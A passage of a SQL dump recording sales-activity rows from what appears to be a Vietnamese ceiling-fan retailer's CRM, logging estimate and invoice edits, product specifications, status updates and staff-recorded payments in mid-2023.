(2391, 'estimate', 221, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:465:\"Model: <br />\r\nSải cánh: 132cm (52 inch), thiết kế sát trần (Low-Profile) <br />\r\nThân màu: Đem/Trắng <br />\r\nMàu cánh: Đen/Trắng, chất liệu nhựa Composite có độ bền cao <br />\r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) <br />\r\nĐiều khiển 7 tốc độ đi kèm <br />\r\nBộ đèn: Chưa bao gồm <br />\r\nThương hiệu: Haiku/USA <br />\r\n\";i:1;s:404:\"Model: \r\nSải cánh: 132cm (52 inch), thiết kế sát trần (Low-Profile) \r\nThân màu: Trắng \r\nMàu cánh: Trắng, chất liệu nhựa Composite có độ bền cao \r\nThiết kế tích hợp SenseME - cảm biến nhiệt, độ ẩm, cảm biến chuyển động hồng ngoại. (Made in USA) \r\nĐiều khiển 7 tốc độ đi kèm \r\nBộ đèn: Chưa bao gồm \r\nThương hiệu: Haiku/USA\";}', '17', 'Loan Nguyễn', '2023-07-14 11:25:53'),
(2392, 'estimate', 221, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:373:\"Sải cánh 132cm (52inch)       <br />\r\nĐộng cơ EC, công suất 20.9W       <br />\r\nMàu thân/cánh: Trắng     <br />\r\nMàu cánh: Caramel   <br />\r\nĐiều khiển từ xa 7 cấp đi kèm    <br />\r\nTuỳ chọn thêm: Đèn LED 2700K dimmble qua điều khiển và APP; Module 0-10V; Module WiFi (điều khiển qua APP)    <br />\r\nThương hiệu: Haiku/USA \";i:1;s:336:\"Sải cánh 132cm (52inch)       \r\nĐộng cơ EC, công suất 20.9W       \r\nMàu thân/cánh: Trắng     \r\nMàu cánh: Caramel   \r\nĐiều khiển từ xa 7 cấp đi kèm    \r\nTuỳ chọn thêm: Đèn LED 2700K dimmble qua điều khiển và APP; Module 0-10V; Module WiFi (điều khiển qua APP)    \r\nThương hiệu: Haiku/USA\";}', '17', 'Loan Nguyễn', '2023-07-14 11:25:53'),
(2393, 'estimate', 221, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-07-14 11:25:53'),
(2394, 'estimate', 222, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-07-14 13:45:32'),
(2395, 'estimate', 222, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-07-14 13:45:39'),
(2396, 'invoice', 302, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-07-16 01:00:01'),
(2397, 'invoice', 318, 'invoice_activity_created', '', '16', 'Phuc Dang', '2023-07-18 10:52:35'),
(2398, 'invoice', 318, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '16', 'Phuc Dang', '2023-07-18 10:57:54'),
(2399, 'invoice', 318, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:539:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";i:1;s:513:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     \r\nMàu cánh: Gỗ Cánh Gián (Dark Wanut Gray Wood)     \r\nĐèn LED: 3 màu, 2700K - 3000K     \r\nĐiều khiển từ xa 5 tốc độ đi kèm     \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '16', 'Phuc Dang', '2023-07-18 11:37:16'),
(2400, 'estimate', 223, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-07-19 16:53:11'),
(2401, 'estimate', 223, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-07-19 16:53:40'),
(2402, 'estimate', 223, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:329:\"Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm \";i:1;s:298:\"Sải cánh 132cm ( ~ 52inch)   \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   \r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   \r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   \r\nĐèn LED: 3 màu, 2700K - 3000K   \r\nĐiều khiển từ xa 5 tốc độ đi kèm\";}', '17', 'Loan Nguyễn', '2023-07-19 16:54:09'),
(2403, 'estimate', 223, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"4600000.00\";i:1;s:10:\"4700000.00\";}', '17', 'Loan Nguyễn', '2023-07-19 17:00:36'),
(2404, 'estimate', 221, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-07-22 01:00:02'),
(2405, 'estimate', 222, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-07-22 01:00:02'),
(2406, 'invoice', 304, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-07-24 01:00:01'),
(2407, 'estimate', 224, 'estimate_activity_created', '', '16', 'Phuc Dang', '2023-07-24 14:18:09'),
(2408, 'estimate', 224, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:45:\"Haiku 60 inch Cocoa Bamboo, Low Profile Black\";}', '16', 'Phuc Dang', '2023-07-24 17:03:50'),
(2409, 'estimate', 224, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:62:\"Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades\";}', '16', 'Phuc Dang', '2023-07-24 17:03:50'),
(2410, 'estimate', 224, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:62:\"Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades\";}', '16', 'Phuc Dang', '2023-07-24 17:05:33'),
(2411, 'estimate', 224, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:62:\"Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades\";}', '16', 'Phuc Dang', '2023-07-24 17:05:34'),
(2412, 'estimate', 224, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:62:\"Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades\";i:1;s:4:\"1.00\";i:2;s:2:\"12\";}', '16', 'Phuc Dang', '2023-07-24 17:05:50'),
(2413, 'estimate', 224, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:62:\"Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades\";}', '16', 'Phuc Dang', '2023-07-25 09:11:57'),
(2414, 'estimate', 224, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:62:\"Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades\";}', '16', 'Phuc Dang', '2023-07-25 09:11:57'),
(2415, 'estimate', 224, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:32:\"Móc treo gia cố quạt trần\";}', '16', 'Phuc Dang', '2023-07-25 09:15:55'),
(2416, 'estimate', 223, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-07-27 01:00:02'),
(2417, 'estimate', 225, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-07-28 13:12:40'),
(2418, 'estimate', 225, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>4</status>\";}', '17', 'Loan Nguyễn', '2023-07-28 13:13:32'),
(2419, 'invoice', 319, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-07-28 15:20:15'),
(2420, 'estimate', 225, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/319\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-07-28 15:20:15'),
(2421, 'invoice', 319, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-28 15:20:17'),
(2422, 'invoice', 319, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-07-28 15:20:17'),
(2423, 'invoice', 319, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:60:\"Chi phí sơn tĩnh điện thân quạt Pearl màu trắng \";i:1;s:59:\"Chi phí sơn tĩnh điện thân quạt Pearl màu trắng\";}', '17', 'Loan Nguyễn', '2023-07-28 15:20:53'),
(2424, 'invoice', 319, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-28 15:21:11'),
(2425, 'invoice', 319, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"33.740.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/327\" target=\"_blank\">#327</a>\";}', '17', 'Loan Nguyễn', '2023-07-28 15:21:11'),
(2426, 'invoice', 320, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-07-31 09:17:59'),
(2427, 'invoice', 320, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-31 09:18:08'),
(2428, 'invoice', 320, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-07-31 09:18:08'),
(2429, 'invoice', 320, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:393:\"Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n\";i:1;s:353:\"Sải cánh 152cm ( ~ 60inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nTuỳ chọn đèn: N/A (không có)\";}', '17', 'Loan Nguyễn', '2023-07-31 09:19:13'),
(2430, 'invoice', 320, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-31 10:01:00'),
(2431, 'invoice', 320, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.100.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/328\" target=\"_blank\">#328</a>\";}', '17', 'Loan Nguyễn', '2023-07-31 10:01:00'),
(2432, 'estimate', 219, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:36:\"Bộ Motor Quạt trần SINO LED 52\";}', '17', 'Loan Nguyễn', '2023-07-31 13:50:30'),
(2433, 'invoice', 321, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-07-31 13:50:35'),
(2434, 'estimate', 219, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/321\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-07-31 13:50:36'),
(2435, 'invoice', 321, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-31 13:50:46'),
(2436, 'invoice', 321, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-07-31 13:50:46'),
(2437, 'estimate', 223, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:36:\"Bộ Motor Quạt trần SINO LED 52\";}', '17', 'Loan Nguyễn', '2023-07-31 13:52:21'),
(2438, 'estimate', 223, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:50:\"Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT\";}', '17', 'Loan Nguyễn', '2023-07-31 13:52:21'),
(2439, 'invoice', 322, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-07-31 13:52:24'),
(2440, 'estimate', 223, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/322\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-07-31 13:52:24'),
(2441, 'invoice', 322, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-07-31 13:52:28'),
(2442, 'invoice', 322, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-07-31 13:52:28'),
(2443, 'invoice', 323, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-07-31 16:16:53'),
(2444, 'invoice', 323, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:393:\"Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n\";i:1;s:353:\"Sải cánh 152cm ( ~ 60inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nTuỳ chọn đèn: N/A (không có)\";}', '1', 'Ho Gia Phat', '2023-07-31 16:17:08'),
(2445, 'invoice', 323, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '1', 'Ho Gia Phat', '2023-07-31 16:17:08'),
(2446, 'invoice', 323, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:52:\"Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood\";i:1;s:4:\"2.00\";i:2;s:1:\"1\";}', '1', 'Ho Gia Phat', '2023-07-31 16:45:06'),
(2447, 'invoice', 323, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:36:\"Quạt trần KATRINA Gray Dark Wood\";}', '1', 'Ho Gia Phat', '2023-07-31 16:45:57'),
(2448, 'invoice', 322, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-01 13:58:32'),
(2449, 'invoice', 322, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.076.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/329\" target=\"_blank\">#329</a>\";}', '17', 'Loan Nguyễn', '2023-08-01 13:58:32'),
(2450, 'invoice', 321, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-01 13:58:48'),
(2451, 'invoice', 321, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/330\" target=\"_blank\">#330</a>\";}', '17', 'Loan Nguyễn', '2023-08-01 13:58:48'),
(2452, 'estimate', 226, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-08-04 09:43:28'),
(2453, 'estimate', 226, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-08-04 09:43:46'),
(2454, 'estimate', 226, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:41:\"Đặt hàng tầm 25 ngày sau có hàng\";}', '17', 'Loan Nguyễn', '2023-08-04 09:46:27'),
(2455, 'invoice', 324, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-04 09:52:31'),
(2456, 'invoice', 324, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-04 09:52:31'),
(2457, 'invoice', 325, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-04 10:03:26'),
(2458, 'estimate', 226, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/325\">INV-DRAFT</a>\";}', '17', 'Loan Nguyễn', '2023-08-04 10:03:26'),
(2459, 'invoice', 325, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-04 10:03:29'),
(2460, 'invoice', 325, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-08-04 10:03:29'),
(2461, 'invoice', 326, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-05 10:19:32'),
(2462, 'invoice', 326, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:61:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC \";i:1;s:60:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC\";}', '17', 'Loan Nguyễn', '2023-08-05 10:20:12');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(2463, 'invoice', 326, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";i:1;s:35:\"Bảo dưỡng, sửa chữa quạt\";}', '17', 'Loan Nguyễn', '2023-08-05 10:20:12'),
(2464, 'invoice', 326, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-05 10:20:19'),
(2465, 'invoice', 326, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-08-05 10:20:19'),
(2466, 'invoice', 327, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-08-05 10:25:27'),
(2467, 'invoice', 327, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:393:\"Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n\";i:1;s:353:\"Sải cánh 152cm ( ~ 60inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nTuỳ chọn đèn: N/A (không có)\";}', '17', 'Loan Nguyễn', '2023-08-05 10:30:54'),
(2468, 'invoice', 327, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:52:\"Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood\";i:1;s:4:\"1.00\";i:2;s:1:\"2\";}', '17', 'Loan Nguyễn', '2023-08-05 10:30:54'),
(2469, 'invoice', 327, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:51:\"Quạt trần SAONA SLIVER 52YFT-7062S (màu Bạc)\";}', '17', 'Loan Nguyễn', '2023-08-05 10:30:54'),
(2470, 'invoice', 327, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-08-05 10:35:21'),
(2471, 'invoice', 327, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-08-05 10:35:21'),
(2472, 'invoice', 311, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:46:\"Quạt trần 5 cánh gỗ NEXUS 60 maple wood\";}', '17', 'Loan Nguyễn', '2023-08-10 09:33:34'),
(2473, 'invoice', 311, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:47:\"Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut\";}', '17', 'Loan Nguyễn', '2023-08-10 09:33:34'),
(2474, 'invoice', 311, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:53:\"Nhân công lắp đặt 3 quạt trần Tổ chức đào tạo WIT\";}', '17', 'Loan Nguyễn', '2023-08-10 09:33:34'),
(2475, 'invoice', 311, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:439:\"Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng/Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China   <br />\r\n   <br />\r\n\";i:1;s:375:\"Sải cánh: 152cm (60 inch)   \r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   \r\nĐộng cơ công suất 40W   \r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   \r\nMàu thân: Trắng/Đen   \r\nMàu cánh: Maple Wood   \r\nĐiều khiển 5 tốc độ theo quạt   \r\nThương hiệu: Tổ chức đào tạo WIT / China\";}', '17', 'Loan Nguyễn', '2023-08-10 09:34:43'),
(2476, 'invoice', 311, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:786:\"Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:707:\"Model: NW 1902\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-08-10 09:34:43'),
(2477, 'invoice', 311, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:38:\"Nhân công lắp đặt quạt trần\";i:1;s:44:\"Nhân công lắp đặt quạt trần Haiku\";}', '17', 'Loan Nguyễn', '2023-08-10 10:02:58'),
(2478, 'invoice', 311, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:47:\"Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut\";i:1;s:53:\"Quạt trần 3 cánh gỗ PEARL 60 Màu Light Chery \";}', '17', 'Loan Nguyễn', '2023-08-10 10:48:28'),
(2479, 'invoice', 311, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:785:\"Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm\";i:1;s:683:\"Model: NW 1902\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color :Light  (chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-08-10 10:48:28'),
(2480, 'invoice', 311, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:417:\"Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng/Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China\";i:1;s:368:\"Sải cánh: 152cm (60 inch)   \r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   \r\nĐộng cơ công suất 40W   \r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   \r\nMàu thân: Trắng \r\nMàu cánh: Maple Wood   \r\nĐiều khiển 5 tốc độ theo quạt   \r\nThương hiệu: Tổ chức đào tạo WIT / China\";}', '17', 'Loan Nguyễn', '2023-08-10 10:49:19'),
